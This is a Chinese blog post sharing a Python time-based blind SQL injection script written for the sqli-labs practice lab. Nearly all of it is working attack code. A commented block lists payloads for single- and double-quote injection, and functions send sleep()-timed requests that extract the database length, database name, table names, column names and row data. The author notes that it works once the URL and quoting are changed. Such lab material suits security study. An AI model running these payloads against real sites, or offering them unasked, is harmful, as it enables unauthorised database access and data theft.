时间盲注脚本
这个脚本是一个时间盲注小脚本,在sqli-labs中17关之前的只要把url改了用这个脚本基本都可以跑的出来,只是要注意闭合方式需要修改,把脚本中的payload更换一下就可以跑出结果来。随便写的就没有写注释了。
#coding:utf-8
import requests
import datetime
import time
"""
k控制着limit
i控制着substr
j控制着所猜字符的ascii
payload :
单引号盲注:
猜数据库长度:
payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
猜数据库名字:
payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
猜表名:
payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
猜列名:
payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
爆数据:
payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
双引号盲注:
猜数据库长度:
payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
猜数据库名字:
payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
猜表名:
payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
猜列名:
payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
爆数据:
payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
"""
url = 'http://192.168.1.6/sqli-labs/Less-10/index.php'
def database_len():
for i in range(1,15):
payload = '?id=1" and if(length(database())>%s,sleep(2),0) --+' %i
#payload = "?id=1' and if(length(database())>%s,sleep(2),0) --+" %i
time1 = datetime.datetime.now()
r = requests.get(url+ payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 2:
print(i)
else:
print(i)
break
print('database_len:',i)
return i
def database_name(len):
name = ''
for i in range(1,len+1):
for j in '0123456789abcdefghijklmnopqrstuvwxyz':
payload = '?id=1" and if(substr(database(),%d,1)="%s",sleep(3),1) --+' % (i,j)
#payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (i,j)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >=3:
name += j
print(name)
break
print('database_name:',name)
def table_name():
name = ''
for k in range(6):
for i in range(10):
for j in range(65,123):
payload = '?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (k, i, j)
#payload = "?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (k, i, j)
time1 = datetime.datetime.now()
r = requests.get(url+payload)
time2 = datetime.datetime.now()
sec = (time2-time1).seconds
if sec >= 3:
name += chr(j)
print(chr(j))
break
print("table_name:",name)
name = ''
def colum_name(table_name):
name = ''
for k in range(6):
for i in range(10):
for j in range(65, 123):
payload = '?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name="%s" and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+' % (table_name, k, i, j)
#payload = "?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1),%d,1))=%d,sleep(3),0) --+" % (table_name, k, i, j)
time1 = datetime.datetime.now()
r = requests.get(url+payload)
time2 = datetime.datetime.now()
sec = (time2-time1).seconds
if sec >= 3:
name += chr(j)
print(chr(j))
break
print("column_name:", name)
name = ''
def data(column,table):
name = ''
for k in range(6):
for i in range(1,10):
for j in range(65,123):
payload = '?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+' % (column,table,k,i,j)
#payload = "?id=1' and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d, sleep(2),0)--+" % (column,table,k,i,j)
time1 = datetime.datetime.now()
r = requests.get(url+payload)
time2 = datetime.datetime.now()
sec = (time2-time1).seconds
if sec >= 2:
name += chr(j)
print(chr(j))
break
print("data:", name)
name = ''
if __name__ == '__main__':
len = database_len()
database_name(len)
table_name()
colum_name('users')
# data('username','users')
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17060050.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!